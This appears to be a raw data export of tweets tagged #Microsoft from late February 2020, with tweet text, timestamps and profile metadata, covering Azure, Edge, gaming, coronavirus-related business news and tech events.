    <t>{'id': 2369466975, 'id_str': '2369466975', 'name': 'â˜ï¸Ross McLachlan â˜ï¸', 'screen_name': 'rossmc', 'location': 'Scotland, United Kingdom', 'description': 'Senior Consultant @qnrltweets | Microsoft Certified Azure Solutions Architect Expert, Azure Administrator Associate &amp; Security Engineer Associate', 'url': 'https://t.co/SHwi6iymf8', 'entities': {'url': {'urls': [{'url': 'https://t.co/SHwi6iymf8', 'expanded_url': 'https://www.rossmc.co.uk', 'display_url': 'rossmc.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 181, 'friends_count': 448, 'listed_count': 40, 'created_at': 'Thu Feb 27 18:17:23 +0000 2014', 'favourites_count': 1303, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1030,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'http://pbs.twimg.com/profile_images/1217194323277762571/oJjYAfhV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217194323277762571/oJjYAfhV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2369466975/1579036927',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</si>
  <si>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17:42:20 +0000 2020</t>
  </si>
  <si>
    <t>I'm a bit of a PC hardware junkie. My main #gaming platform is my computer, followed by my #X1X.  I have to say that #Microsoft is doing their best to impress with the specs on the #XboxSeriesX. That hardware "base" will last them much longer than the HW base of the #XboxOne.</t>
  </si>
  <si>
    <t>Thu Feb 27 17:41:53 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 17:40:57 +0000 2020</t>
  </si>
  <si>
    <t>Steve Logan demonstrating @NICELtd's exciting recording software. Did you know we can record up to a 10 person MS Teams video chat as well as their IMs linked to the topic - impressive stuff right?! We think so. #NICECompliance #Microsoft https://t.co/ucugBRSHEW</t>
  </si>
  <si>
    <t>{'id': 1324396256, 'id_str': '1324396256', 'name': 'NICE CX', 'screen_name': 'NICE_CX', 'location': '', 'description': 'NICE is the worldwide leader of intent-based solutions that capture and analyze interactions and transactions. #CX #custexp #custserv', 'url': 'https://t.co/FFm7hxd7gA', 'entities': {'url': {'urls': [{'url': 'https://t.co/FFm7hxd7gA', 'expanded_url': 'http://www.nice.com', 'display_url': 'nice.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4201, 'friends_count': 3423, 'listed_count': 354, 'created_at': 'Wed Apr 03 11:30:40 +0000 2013', 'favourites_count': 3087, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21996,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'http://pbs.twimg.com/profile_images/679300171675619328/XwQxeylA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/679300171675619328/XwQxeylA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1324396256/1513547500',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</si>
  <si>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17:40:23 +0000 2020</t>
  </si>
  <si>
    <t>New episode of VIP.  Subscribe to the channel.  #subscribetovideogamevotaryonyoutube #followvideogamevotaryontwitch #gamer #gaming #videogamecollector #supportallgamers #supportallstreamers #nintendo #sony #microsoft #anime #atari #intellivision 
https://t.co/B55g3NMohx</t>
  </si>
  <si>
    <t>{'id': 1075057867709956096, 'id_str': '1075057867709956096', 'name': 'Video Game Votary', 'screen_name': 'VideoGameVotary', 'location': '', 'description': 'video game votary! search me on YouTube and twitch!', 'url': 'https://t.co/8q6d2CvIDO', 'entities': {'url': {'urls': [{'url': 'https://t.co/8q6d2CvIDO', 'expanded_url': 'https://www.youtube.com/channel/UC_L-vXmUNhfijmdpTbbtVtw', 'display_url': 'youtube.com/channel/UC_L-vâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 89, 'listed_count': 1, 'created_at': 'Tue Dec 18 15:59:04 +0000 2018', 'favourites_count': 150, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 803, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1131918361946992645/RmHW9rcP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1131918361946992645/RmHW9rcP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1075057867709956096/1571087592',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</si>
  <si>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17:40:00 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC
#Microsoft #Azure
https://t.co/r3PGGAQump</t>
  </si>
  <si>
    <t>Thu Feb 27 17:38:59 +0000 2020</t>
  </si>
  <si>
    <t>The new Microsoft Edge is here. Check out how to download it and some of the new features here. #Edge #Windows #Search #Tech #Microsoft #Innovation https://t.co/XeKBGIqouB</t>
  </si>
  <si>
    <t>Thu Feb 27 17:38:41 +0000 2020</t>
  </si>
  <si>
    <t>The  life of a #virtualassistant- starring #cortana, feat. #alexa. An intriguing glimpse into the future, indeed!
#Microsoft #Amazon #AI #futuristic https://t.co/Ry0CpCQNGb</t>
  </si>
  <si>
    <t>{'id': 1217815556818001921, 'id_str': '1217815556818001921', 'name': 'Nived', 'screen_name': 'the_nived', 'location': '', 'description': "Searching wisdom since '99\nWith â¤ from ðŸ‡®ðŸ‡³.", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 40, 'listed_count': 0, 'created_at': 'Thu Jan 16 14:27:18 +0000 2020', 'favourites_count': 128,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'http://pbs.twimg.com/profile_images/1217815811231899649/KWr42DDY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217815811231899649/KWr42DDY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1217815556818001921/1579194844',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</si>
  <si>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17:37:54 +0000 2020</t>
  </si>
  <si>
    <t>Hey #BayArea, are you interested in learning more about #RxJS and #Angular? Join @ShmuelaJ and @WomenWhoCodeSV on Apr 14 for an intense #javascript workshop. @WomenWhoCode @azureadvocates #microsoft 
Sign up!
https://t.co/tEdhim4jVu</t>
  </si>
  <si>
    <t>Thu Feb 27 17:36:15 +0000 2020</t>
  </si>
  <si>
    <t>#Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/u7XsORwpQV via @hybrid_ts #Microsoft https://t.co/c3cj1su5GH</t>
  </si>
  <si>
    <t>Thu Feb 27 17:34:02 +0000 2020</t>
  </si>
  <si>
    <t>Thu Feb 27 17:33:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft protecting users from potentially unwanted applications #PUA in #MicrosoftEdge #Chromium #MicrosoftEdgeChromium 
See: https://t.co/S9ADeH8WFh</t>
  </si>
  <si>
    <t>Thu Feb 27 17:32:41 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC  https://t.co/ZatrgdFr38 #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Thu Feb 27 17:32:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft says the #coronavirus outbreak's effect on personal computer giants like #Acer and #Lenovo will cause it to fall short of the $10.75 to $11.15 billion quarterly revenue it had predicted. May last awhile, too. It named its latest system update Microsoft Hasta La Vista. https://t.co/8k2h0uE9Pt</t>
  </si>
  <si>
    <t>{'id': 58488519, 'id_str': '58488519', 'name': 'Robert L. Mills, Esq.', 'screen_name': 'TheLaughMakers', 'location': 'Studio City, California', 'description': 'Attorney, TV comedy writer, author of THE LAUGH MAKERS: A Tribute to Bob Hope\'s Incredible Gag Writers, multi media show "Bob Hope Backstage." Twitterer.', 'url': 'https://t.co/wmmsOxLmXS', 'entities': {'url': {'urls': [{'url': 'https://t.co/wmmsOxLmXS', 'expanded_url': 'http://BobHopeShowBackstage.Blogspot.com', 'display_url': 'BobHopeShowBackstage.Blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1622, 'friends_count': 4133, 'listed_count': 50, 'created_at': 'Mon Jul 20 14:37:32 +0000 2009', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13361, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '8B542B', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1186780820188479488/mKqILHjG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186780820188479488/mKqILHjG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/58488519/1442934321', 'profile_link_color': '9D582E', 'profile_sidebar_border_color': 'D9B17E', 'profile_sidebar_fill_color': 'EADEAA', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 17:32:07 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC: https://t.co/0Ubg3HRXXW #Azure #Microsoft</t>
  </si>
  <si>
    <t>The Complete Guide to Scale-Out File Server for Hyper-V: https://t.co/udNzUqaobo #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:32:06 +0000 2020</t>
  </si>
  <si>
    <t>Protecting users from potentially unwanted applications in Microsoft Edge: https://t.co/O9GdvYQzXg #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:32:00 +0000 2020</t>
  </si>
  <si>
    <t>Find out how to use Ascertia's Virtual CSP, a lightweight plug-in for the Microsoft Windows operating system which enables documents, emails and other data formats to be signed remotely https://t.co/7c68waUUqn #howto #microsoft https://t.co/QqY7h1Ze3U</t>
  </si>
  <si>
    <t>{'id': 599365854, 'id_str': '599365854', 'name': 'SigningHub', 'screen_name': 'SigningHub', 'location': 'London, United Kingdom', 'description': 'Welcome to the official SigningHub Twitter page. Learn about the #MostSecureWaytoSign #documents using an EU #eIDAS compliant solution.', 'url': 'http://t.co/qwWcktY4oO', 'entities': {'url': {'urls': [{'url': 'http://t.co/qwWcktY4oO', 'expanded_url': 'http://www.signinghub.com/', 'display_url': 'signinghub.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1391, 'friends_count': 2360, 'listed_count': 369, 'created_at': 'Mon Jun 04 14:26:49 +0000 2012', 'favourites_count': 937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10927,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'http://pbs.twimg.com/profile_images/1111519957056147456/7yCfskRQ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111519957056147456/7yCfskRQ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/599365854/1470898564',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</si>
  <si>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17:30:55 +0000 2020</t>
  </si>
  <si>
    <t>My new pen.  #Microsoft https://t.co/PRqyQcSBsf</t>
  </si>
  <si>
    <t>{'id': 42557832, 'id_str': '42557832', 'name': 'Ricardo Romo', 'screen_name': 'ricky3c', 'location': 'Jalisco, MÃ©xico', 'description': 'Xamarin Mobile Developer', 'url': 'https://t.co/1PHFfdJ5U1', 'entities': {'url': {'urls': [{'url': 'https://t.co/1PHFfdJ5U1', 'expanded_url': 'https://github.com/ricardoromo', 'display_url': 'github.com/ricardoromo', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 294, 'friends_count': 516, 'listed_count': 15, 'created_at': 'Tue May 26 03:48:16 +0000 2009', 'favourites_count': 746, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2273,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'http://pbs.twimg.com/profile_images/1222725203521949696/b2r5A8DH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1222725203521949696/b2r5A8DH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/42557832/1543501984',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</si>
  <si>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17:30:29 +0000 2020</t>
  </si>
  <si>
    <t>Hackers are scanning for vulnerable #Microsoft #Exchange servers, patch now !
https://t.co/kOhKguexDl</t>
  </si>
  <si>
    <t>Thu Feb 27 17:30:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft won't give up on VR, promises to improve hardware! #VR/#AR #RoadToVR
#Oculus Rift @oculus #Microsoft #SteamVR @RealityVirtuaI @#HTC @htcvive 
https://t.co/peG62CAx80 https://t.co/IQCYhnjdoq</t>
  </si>
  <si>
    <t>{'id': 2946279544, 'id_str': '2946279544', 'name': 'VirtualReality Times', 'screen_name': 'virtrealitytime', 'location': 'Seattle, WA', 'description': 'Oculus Rift and Virtual Reality News and Blog', 'url': 'http://t.co/hEsYEzsi06', 'entities': {'url': {'urls': [{'url': 'http://t.co/hEsYEzsi06', 'expanded_url': 'http://www.virtualrealitytimes.com', 'display_url': 'virtualrealitytimes.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 16800, 'friends_count': 5019, 'listed_count': 549, 'created_at': 'Sun Dec 28 18:45:07 +0000 2014', 'favourites_count': 292, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10779,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'http://pbs.twimg.com/profile_images/549275173388431360/vYKQu3Ln_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/549275173388431360/vYKQu3Ln_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2946279544/1419792452',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</si>
  <si>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17:30:23 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Business? Business Premium? E3 or E5? Which #Office365 package is right for my law firm? @bschorr #microsoft  https://t.co/OEaUYBTTwC https://t.co/9WSNpfyysX</t>
  </si>
  <si>
    <t>Thu Feb 27 17:29:44 +0000 2020</t>
  </si>
  <si>
    <t>Visit Booth 415 at #HIMSS20 for a chance to win a free #Microsoft Surface Go and 1 Year of Office 365, Free! https://t.co/ML71ZhHKBl</t>
  </si>
  <si>
    <t>{'id': 426493855, 'id_str': '426493855', 'name': 'Project Hosts', 'screen_name': 'Project_Hosts', 'location': 'Sunnyvale, CA', 'description': '#Microsoft exclusive Cloud Solutions Provider specializing in #cloud #FedRAMP #DoD #DoDIL4 #DoDIL5 #HITRUST #HIPAA #HealthcareIT', 'url': 'http://t.co/wREfzzbEJk', 'entities': {'url': {'urls': [{'url': 'http://t.co/wREfzzbEJk', 'expanded_url': 'http://www.projecthosts.com', 'display_url': 'projecthosts.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 388, 'friends_count': 234, 'listed_count': 32, 'created_at': 'Fri Dec 02 09:25:28 +0000 2011', 'favourites_count': 220, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1184, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B7BEC2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1783679807/IconOnly_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1783679807/IconOnly_normal.jpg', 'profile_link_color': 'E67C2B', 'profile_sidebar_border_color': 'E67C2B', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '403F40', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 17:28:17 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/PbTXmWFK0M #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 17:28:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft shares fall 4% after warning of coronavirus hit to supply chain. #Microsoft https://t.co/6JARvj9Rxp</t>
  </si>
  <si>
    <t>{'id': 953592132, 'id_str': '953592132', 'name': 'Andrew Duncan', 'screen_name': 'andrewsduncan1', 'location': 'London. United Kingdom', 'description': 'Journalist Extraordinaire. Retweets/follow are not an endorsement.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2023, 'friends_count': 1256, 'listed_count': 475, 'created_at': 'Sat Nov 17 13:45:15 +0000 2012', 'favourites_count': 45846, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 102312,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'http://pbs.twimg.com/profile_images/663730127906463744/l017r0-__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/663730127906463744/l017r0-__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/953592132/1447081584',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</si>
  <si>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17:28:00 +0000 2020</t>
  </si>
  <si>
    <t>#RedHat's #SPICE 0.14.3 Display System Now Supports #Microsoft #Windows
https://t.co/KhwS0TTUbM</t>
  </si>
  <si>
    <t>Thu Feb 27 17:27:48 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/usa4bwx8G0 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 17:26:05 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC  https://t.co/7o2IikcSbz  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Feb 27 17:25:48 +0000 2020</t>
  </si>
  <si>
    <t>Aaaaand...Koding Connect 17 is now live on Youtube!
Join us here: https://t.co/YKw4ieRt4Y
#kodingconnect #madeincotroceni #cloudtechnology #microsoft #techevent https://t.co/p9NPL7d59P</t>
  </si>
  <si>
    <t>{'id': 789568882679943173, 'id_str': '789568882679943173', 'name': 'KodingTech', 'screen_name': 'KodingRo', 'location': 'Bucharest, Romania', 'description': 'Leading end to end IT integrator. Hardware and software, customized to make your business grow smoothly. Delivering the tech version of your business vision.', 'url': 'https://t.co/OEJYRUndxu', 'entities': {'url': {'urls': [{'url': 'https://t.co/OEJYRUndxu', 'expanded_url': 'https://www.kodingtech.com', 'display_url': 'kodingtech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 13, 'friends_count': 46, 'listed_count': 0, 'created_at': 'Fri Oct 21 20:47:45 +0000 2016', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/789569374256594946/9Upponfc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/789569374256594946/9Upponfc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/789568882679943173/1525687298',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</si>
  <si>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17:24:18 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/YcVX4quvPR #Azure #Microsoft</t>
  </si>
  <si>
    <t>Protecting users from potentially unwanted applications in Microsoft Edge #Microsoft #Windows10 #MicrosoftEdge https://t.co/TPWhbaMUAz</t>
  </si>
  <si>
    <t>Thu Feb 27 17:22:47 +0000 2020</t>
  </si>
  <si>
    <t>Rumor: Microsoft preparing to remove Live Tiles from Windows 10 #windows10 #microsoft
https://t.co/f6pdcgXbfK https://t.co/ZacQP2bDUo</t>
  </si>
  <si>
    <t>Thu Feb 27 17:22:05 +0000 2020</t>
  </si>
  <si>
    <t>When your son thinks you got your taxes back. 
...now I gotta beat him 
#Microsoft #XboxOne #ARefundorNah https://t.co/S8ysmnMnPM</t>
  </si>
  <si>
    <t>{'id': 3670582161, 'id_str': '3670582161', 'name': '| TaShonna |', 'screen_name': '_YoursTruly89', 'location': '', 'description': 'Womanist â€¢ Mom of Two Boys â€¢ Astrology â€¢ Motherhood â€¢ Shit-Talker â€¢ Future Mommy Mogul\n#TheEmploymentCoach #ResumeWriting #BBW\nâ™ Sun â™’Moon â™‰ Rising', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1735, 'friends_count': 1167, 'listed_count': 10, 'created_at': 'Wed Sep 16 03:27:53 +0000 2015', 'favourites_count': 6755, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12926,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'http://pbs.twimg.com/profile_images/1227573799228526594/xiyzjNn8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227573799228526594/xiyzjNn8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3670582161/1581567105',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</si>
  <si>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17:21:00 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC  https://t.co/4dmjjIgasC  #azure #microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:20:53 +0000 2020</t>
  </si>
  <si>
    <t>#MICROSOFT WITHDRAWS FROM GAME SHOW IN SAN FRANCISCO ON VIRUS</t>
  </si>
  <si>
    <t>Thu Feb 27 17:19:01 +0000 2020</t>
  </si>
  <si>
    <t>"#Technology News: Analysis | The #Technology 202: #Microsoft's warning to investors shows worsening coronavirus impact on tech - The Washington Post #News": https://t.co/9kmVVe3VWM</t>
  </si>
  <si>
    <t>Thu Feb 27 17:18:53 +0000 2020</t>
  </si>
  <si>
    <t>Admins beware! #Microsoft gives heads-up for 'disruptive' changes to authentication in #Office365 email service  The Register
"Basic authentication will be OFF for #Exchange Online #email and other services from October 2020" https://t.co/4Ra2nt5RB9</t>
  </si>
  <si>
    <t>{'id': 495066576, 'id_str': '495066576', 'name': 'Judyth Mermelstein', 'screen_name': 'GadflyQuebec', 'location': 'Canada Tiohtiak:ke', 'description': 'freelance writer, editor, translator (francais-anglais) and semi-geek; omnivorous reader and news junkie lectrice omnivore bilingue', 'url': 'https://t.co/BvtEjbzPMK', 'entities': {'url': {'urls': [{'url': 'https://t.co/BvtEjbzPMK', 'expanded_url': 'http://judythlapomme.wordpress.com', 'display_url': 'judythlapomme.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3831, 'friends_count': 5002, 'listed_count': 408, 'created_at': 'Fri Feb 17 15:21:11 +0000 2012', 'favourites_count': 45021, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 284080,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'http://pbs.twimg.com/profile_images/2281304775/7yfz97dq0dl99xwk6goy_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2281304775/7yfz97dq0dl99xwk6goy_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/495066576/1348680874', 'profile_link_color': 'D02B55',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</si>
  <si>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17:18:42 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/gNJmFZwoks  #Cloud #CloudComputing #Azure #Microsoft via Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 17:18:34 +0000 2020</t>
  </si>
  <si>
    <t>Protecting users from potentially unwanted applications in Microsoft Edge https://t.co/0ekISTY9bt #Microsoft #MSEdgeDev #MicrosoftEdge #Insider</t>
  </si>
  <si>
    <t>Thu Feb 27 17:18:08 +0000 2020</t>
  </si>
  <si>
    <t>Africas technology start-up scene is vibrant and growing fast, yet there seems to be a short supply of women led startups.    #ATSKGL #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode https://t.co/Ytc3d3He79</t>
  </si>
  <si>
    <t>Thu Feb 27 17:17:57 +0000 2020</t>
  </si>
  <si>
    <t>The sun has come out and the bar has opened. Our #Microsoft and #NICE presenters are ready for the Enabling Compliance Forum followed by happy hour! #Compliance #NetworkwithNICE https://t.co/RtRARwjcA9</t>
  </si>
  <si>
    <t>Thu Feb 27 17:17:38 +0000 2020</t>
  </si>
  <si>
    <t>#Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI #HPC. #Microsoft #Cloud #MSFTadvocate #VirtualMachines #VM
https://t.co/fYd552N93h</t>
  </si>
  <si>
    <t>Thu Feb 27 17:17:09 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive Customer Spotlight Series:  Rackspace https://t.co/WLlqi5kudb #Microsoft</t>
  </si>
  <si>
    <t>Protecting users from potentially unwanted applications in Microsoft Edge https://t.co/Mu4hLrYHuI #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 17:16:49 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC
- Extreme HPC I/O meets cost-efficiency
- 10x-ing the cloud HPC experience
https://t.co/EC7l4izJFJ
#Azure #Microsoft #Cloud #Compute #VirtualMachines #CPU #Performance #HighPerformanceCompute https://t.co/4L79IpGOAw</t>
  </si>
  <si>
    <t>Thu Feb 27 17:16:09 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD, MCSE certifications retire; with continued investment to role-based certifications. #certification #microsoft https://t.co/NmZqrvkhIH</t>
  </si>
  <si>
    <t>{'id': 6832532, 'id_str': '6832532', 'name': 'Alvin ðŸ¿ Ashcraft', 'screen_name': 'alvinashcraft', 'location': 'West Grove, PA', 'description': 'Principal Software Engineer at @Allscripts. @TechBash organizer &amp; MS Windows Dev MVP. Blogs: Morning Dew, https://t.co/2Pc5sKi7k6 &amp; https://t.co/IDQoHoB8Kh. NY Mets fan. he/him', 'url': 'https://t.co/Dll2tzNLkf', 'entities': {'url': {'urls': [{'url': 'https://t.co/Dll2tzNLkf', 'expanded_url': 'http://alvinashcraft.com', 'display_url': 'alvinashcraft.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/2Pc5sKi7k6', 'expanded_url': 'http://wpf.tips', 'display_url': 'wpf.tips', 'indices': [106, 129]}, {'url': 'https://t.co/IDQoHoB8Kh', 'expanded_url': 'http://WinUI.tips', 'display_url': 'WinUI.tips', 'indices': [132, 155]}]}}, 'protected': False, 'followers_count': 6683, 'friends_count': 6931, 'listed_count': 501, 'created_at': 'Fri Jun 15 12:47:01 +0000 2007', 'favourites_count': 18208, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26462, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9266CC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/981880229957459968/1czDjnFu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/981880229957459968/1czDjnFu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/6832532/1510004204', 'profile_link_color': '89C9FA',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</si>
  <si>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Feb 27 17:16:04 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/DcMCx5Oyt8 #Microsoft #Azure #Cloud https://t.co/RqIIpChFy5</t>
  </si>
  <si>
    <t>Thu Feb 27 17:15:58 +0000 2020</t>
  </si>
  <si>
    <t>Rate my setup? #Nintendo #wii #WiiU #pacman #xbox360 #microsoft #steamlink #valve #steambox #PlayStation #sony #Playstation4 #pokemon #PokemonDay #PokemonDay2020 https://t.co/IVHsUoAbkJ</t>
  </si>
  <si>
    <t>{'id': 793511558471004160, 'id_str': '793511558471004160', 'name': 'Emma Green', 'screen_name': 'MsEmmaGreen', 'location': 'Sacramento, CA', 'description': 'Influencer, Model, Lifestyle Blogger', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 634, 'friends_count': 357, 'listed_count': 14, 'created_at': 'Tue Nov 01 17:54:33 +0000 2016', 'favourites_count': 4777, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 336,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'http://pbs.twimg.com/profile_images/793528917864742914/sjhExttp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/793528917864742914/sjhExttp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/793511558471004160/1478027307',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</si>
  <si>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17:15:43 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft looking to invest in Indonesian data centres #Microsoft #Indonesia: https://t.co/H4mVfoND6o via @NeowinFeed</t>
  </si>
  <si>
    <t>Thu Feb 27 17:14:37 +0000 2020</t>
  </si>
  <si>
    <t>Squad wipe!
#mixer #mixercommunity #mixerstreamer #streamer  #smallstreamer #apexlegends #apexchampion #apexlegendsclips #mirage #bamboozle #bamboozled #twitch #gaming #gamer #gamingclips #Xbox #microsoft #crawfish #crawdaddy https://t.co/wdPofpRDLD</t>
  </si>
  <si>
    <t>Thu Feb 27 17:14:00 +0000 2020</t>
  </si>
  <si>
    <t>"We need to have diversity in more management and leadership positions because diversity attracts diversity."  #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode https://t.co/t5fPwMOpg0</t>
  </si>
  <si>
    <t>Thu Feb 27 17:12:58 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive #CustomerSpotlight Series:  Rackspace #HostingService #SpotlightSeries https://t.co/8LNpPHqoNJ #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>Thu Feb 27 17:12:03 +0000 2020</t>
  </si>
  <si>
